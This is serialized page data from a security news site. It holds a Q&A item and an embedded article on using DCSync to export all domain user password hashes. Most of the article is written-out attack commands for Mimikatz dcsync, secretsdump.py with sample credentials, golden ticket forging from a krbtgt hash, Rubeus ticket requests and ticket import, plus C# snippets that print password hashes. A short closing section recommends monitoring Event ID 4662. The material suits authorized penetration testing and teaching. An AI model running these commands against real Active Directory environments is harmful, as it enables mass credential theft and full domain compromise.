[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fRFLIf4QXvVrOta6hta5fXG1zfhmgS5A16EFsdy4bodY":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":33,"aiModel":30,"aiConfidence":30,"updatedAt":48,"createdAt":48,"_status":47},237,"What tools can be used to execute a DCSync attack and how do they differ?","Common tools include Mimikatz (C implementation), secretsdump.py (Python), MakeMeEnterpriseAdmin (PowerShell\u002FC#), and modified C# versions like SharpDCSync. Mimikatz can export all or single user hashes, while secretsdump.py is a Python alternative. The C# implementations offer a .NET-based approach requiring a prior high-privilege ticket. Each tool ultimately performs the same replication request but differs in execution environment and command syntax. Refer to the main article for detailed command examples.","\u003Cp>Common tools include Mimikatz (C implementation), secretsdump.py (Python), MakeMeEnterpriseAdmin (PowerShell\u002FC#), and modified C# versions like SharpDCSync. Mimikatz can export all or single user hashes, while secretsdump.py is a Python alternative. The C# implementations offer a .NET-based approach requiring a prior high-privilege ticket. Each tool ultimately performs the same replication request but differs in execution environment and command syntax. Refer to the main article for detailed command examples.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fdomain-penetration-method-to-export-all-domain-user-hashes-using-dcsync\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-tools-can-be-used-to-execute-a-dcsync-attack-and-how-do-they-differ-1777484527798","Mimikatz, secretsdump, MakeMeEnterpriseAdmin, SharpDCSync, DCSync tools",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":27,"cover":30,"author":31,"views":19,"readingTime":32,"status":33,"publishedAt":34,"seo":35,"tags":37,"qaPairs":38,"meta":44,"updatedAt":45,"createdAt":46,"_status":47},62,"Domain Penetration - Method to Export All Domain User Hashes Using DCSync","domain-penetration-method-to-export-all-domain-user-hashes-using-dcsync","---",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In a previous article, 'Domain Penetration - DCSync,' the exploitation methods of DCSync were systematically summarized. This article will provide a detailed introduction to the method of exporting all domain user hashes using DCSync, analyze exploitation approaches in different environments, and offer defense recommendations.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Exploitation Conditions\u003C\u002Fli>\u003Cli>Exploitation Tools\u003C\u002Fli>\u003Cli>Exploitation Approaches\u003C\u002Fli>\u003Cli>Defense Recommendations\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Exploitation Conditions\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Obtain permissions for any of the following users:\u003C\u002Fp>\u003Cul>\u003Cli>Users within the Administrators group\u003C\u002Fli>\u003Cli>Users in the Domain Admins group\u003C\u002Fli>\u003Cli>Users in the Enterprise Admins group\u003C\u002Fli>\u003Cli>Computer accounts of domain controllers\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x03 Exploitation Tools\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1.C Implementation (mimikatz)\u003C\u002Fh3>\u003Cp>Implementation code:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fgentilkiwi\u002Fmimikatz\u002Fblob\u002Fmaster\u002Fmimikatz\u002Fmodules\u002Flsadump\u002Fkuhl_m_lsadump_dc.c#L27\u003C\u002Fp>\u003Cp>Example commands:\u003C\u002Fp>\u003Ch4>(1) Export hashes of all users in the domain\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe \"lsadump::dcsync \u002Fdomain:test.com \u002Fall \u002Fcsv\" exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Export hash of the administrator account in the domain\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe \"lsadump::dcsync \u002Fdomain:test.com \u002Fuser:administrator \u002Fcsv\" exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2.Python Implementation (secretsdump.py)\u003C\u002Fh3>\u003Cp>Example commands:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>python secretsdump.py test\u002FAdministrator:DomainAdmin123!@192.168.1.1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. PowerShell Implementation (MakeMeEnterpriseAdmin)\u003C\u002Fh3>\u003Cp>Core code implemented in C#, supporting the following three functions:\u003C\u002Fp>\u003Cul>\u003Cli>Export hash of krbtgt user via DCSync\u003C\u002Fli>\u003Cli>Generate Golden ticket using krbtgt user's hash\u003C\u002Fli>\u003Cli>Import Golden ticket\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>My test environment results show that the Golden ticket generation function has a bug; corresponding permissions cannot be obtained after importing the Golden ticket\u003C\u002Fp>\u003Ch3>4. C# Implementation\u003C\u002Fh3>\u003Cp>Based on (MakeMeEnterpriseAdmin), I have made the following modifications:\u003C\u002Fp>\u003Cul>\u003Cli>Support exporting all user hashes\u003C\u002Fli>\u003Cli>Export domain SID\u003C\u002Fli>\u003Cli>Export all domain user SIDs\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Code has been uploaded to GitHub, address as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Ch4>Supplement: Code Development Details\u003C\u002Fh4>\u003Cp>Output all keys and values in the Dictionary:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>foreach(string key in values.Keys)\u003Cbr>{\u003Cbr>    Console.WriteLine(string.Format(\"key:{0} value{1}\", key, values[key]));\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Convert byte array to string for hash output:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>byte[] data = values[\"ATT_UNICODE_PWD\"] as byte[];\u003Cbr>Console.WriteLine(BitConverter.ToString(data).Replace(\"-\",\"\"));\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Convert string to byte array to transform hash into byte array:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>string hex = \"D4FE97B4FD50367C7AE8FEF781F27A2E\";\u003Cbr>var inputByteArray = new byte[hex.Length \u002F 2];\u003Cbr>for (var x = 0; x &lt; inputByteArray.Length; x++)\u003Cbr>{\u003Cbr>    var i = Convert.ToInt32(hex.Substring(x * 2, 2), 16);\u003Cbr>    inputByteArray[x] = (byte)i;\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x04 Exploitation Approach\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Execute on Domain Controller\u003C\u002Fh3>\u003Cp>All tools mentioned in 0x03 can be used\u003C\u002Fp>\u003Ch3>2. Execute on Domain Host\u003C\u002Fh3>\u003Ch4>(1) Mimikatz\u003C\u002Fh4>\u003Cp>There are two exploitation approaches:\u003C\u002Fp>\u003Cul>\u003Cli>Import ticket, execute DCSync\u003C\u002Fli>\u003Cli>Use Over pass the hash to launch script, script executes DCSync\u003C\u002Fli>\u003C\u002Ful>\u003Ch4>(2) secretsdump.py\u003C\u002Fh4>\u003Cp>Execute directly\u003C\u002Fp>\u003Ch4>(3) C Sharp Implementation\u003C\u002Fh4>\u003Cp>First need to generate ticket\u003C\u002Fp>\u003Cp>There are two exploitation approaches:\u003C\u002Fp>\u003Col>\u003Cli>Obtain the hash of the krbtgt user and generate a Golden ticket locally using Mimikatz\u003C\u002Fli>\u003C\u002Fol>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz \"kerberos::golden \u002Fuser:Administrator \u002Fdomain:TEST.COM \u002Fsid:S-1-5-21-254706111-4049838133-2416123456 \u002Fkrbtgt:D4FE97B4FD50367C7AE8FEF781F27A2E \u002Fticket:test.kirbi\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Col>\u003Cli>Obtain a high-privilege user and use Rubeus to send a request to obtain a ticket\u003C\u002Fli>\u003C\u002Fol>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Rubeus.exe asktgt \u002Fuser:administrator \u002Fpassword:123456 \u002Foutfile:test.kirbi\u003Cbr>Rubeus.exe asktgt \u002Fuser:administrator \u002Frc4:D4FE97B4FD50367C7AE8FEF781F27A2E \u002Foutfile:test.kirbi\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Then import the ticket\u003C\u002Fp>\u003Cp>You can choose SharpTGTImporter.cs, the code has been uploaded to GitHub, address as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>I have made the following modifications based on (MakeMeEnterpriseAdmin):\u003C\u002Fp>\u003Cul>\u003Cli>Supports importing specified ticket files\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>SharpTGTImporter.exe test.kirbi\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Finally execute DCSync\u003C\u002Fp>\u003Cp>To export all user hashes, you can choose SharpDCSync.cs. The code has been uploaded to GitHub, address as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>SharpDCSync.exe dc1.test.com TEST.COM\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>To export the krbtgt user hash, you can choose SharpDCSync_krbtgt.cs. The code has been uploaded to GitHub, address as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>SharpDCSync_krbtgt.exe dc1.test.com TEST.COM\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. Execute on a host outside the domain\u003C\u002Fh3>\u003Cp>Method is the same as \"2. Execute on a host inside the domain\"\u003C\u002Fp>\u003Ch2>0x05 Defense Recommendations\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The attacker requires permissions from any of the following users:\u003C\u002Fp>\u003Cul>\u003Cli>Users within the Administrators group\u003C\u002Fli>\u003Cli>Users in the Domain Admins group\u003C\u002Fli>\u003Cli>Users in the Enterprise Admins group\u003C\u002Fli>\u003Cli>Computer accounts of domain controllers\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Event log detection can be performed by monitoring Event ID 4662\u003C\u002Fp>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.blacklanternsecurity.com\u002F2020-12-04-DCSync\u002F\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces methods for exporting all user hashes within a domain using DCSync. Based on (MakeMeEnterpriseAdmin), code was developed in SharpTGTImporter.cs and SharpDCSync.cs for ease of exploitation. Combined with exploitation approaches, defensive recommendations are provided.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr",null,"Onedaysec",3,"published","2026-02-02T08:07:20.755Z",{"title":12,"description":14,"keywords":18,"ogImage":30,"canonicalUrl":30,"noIndex":36},false,[],{"docs":39,"hasNextPage":36},[40,41,42,4,43],240,239,238,236,{"title":30,"description":30,"image":30},"2026-07-24T02:07:27.530Z","2026-07-23T16:01:14.303Z","draft","2026-07-23T16:04:45.409Z"]